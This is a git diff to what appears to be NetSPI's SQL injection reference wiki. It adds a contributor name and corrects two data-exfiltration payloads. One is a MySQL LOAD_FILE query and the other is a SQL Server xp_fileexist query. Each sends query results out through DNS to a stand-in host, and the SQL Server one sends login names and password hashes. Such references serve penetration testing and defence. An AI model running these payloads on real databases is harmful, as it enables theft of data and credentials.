diff --git a/README.md b/README.md index dcbefb1..8db78cc 100644 --- a/README.md +++ b/README.md @@ -14,6 +14,7 @@ See [CONTRIBUTING.md](https://github.com/NetSPI/WikiJekyllTheme/blob/master/CONT - Ben Tindell - Colin Salisbury - Eric Gruber (@egru) +- Ian Williams (@aph3rson) - Jake Reynolds (@jreynoldsdev) - Khai Tran (@k_tr4n) - Rafael Seferyan diff --git a/attackQueries/dataExfiltration/mysql.html b/attackQueries/dataExfiltration/mysql.html index b1d832f..8ea22f3 100644 --- a/attackQueries/dataExfiltration/mysql.html +++ b/attackQueries/dataExfiltration/mysql.html @@ -13,7 +13,7 @@

Data Exfiltration

DNS Request - SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), 'yourhost.com\\')) + SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), '.yourhost.com\\')) SMB Share diff --git a/attackQueries/dataExfiltration/sqlserver.html b/attackQueries/dataExfiltration/sqlserver.html index 3bad19b..a813cce 100644 --- a/attackQueries/dataExfiltration/sqlserver.html +++ b/attackQueries/dataExfiltration/sqlserver.html @@ -13,7 +13,7 @@

Data Exfiltration

Make DNS Request - DECLARE @host varchar(800);
select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins;
exec('xp_fileexist "\' + @host + 'c$boot.ini"'); + DECLARE @host varchar(800);
select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins;
exec('xp_fileexist "\' + @host + 'c$boot.ini"'); UNC Path (DNS Request)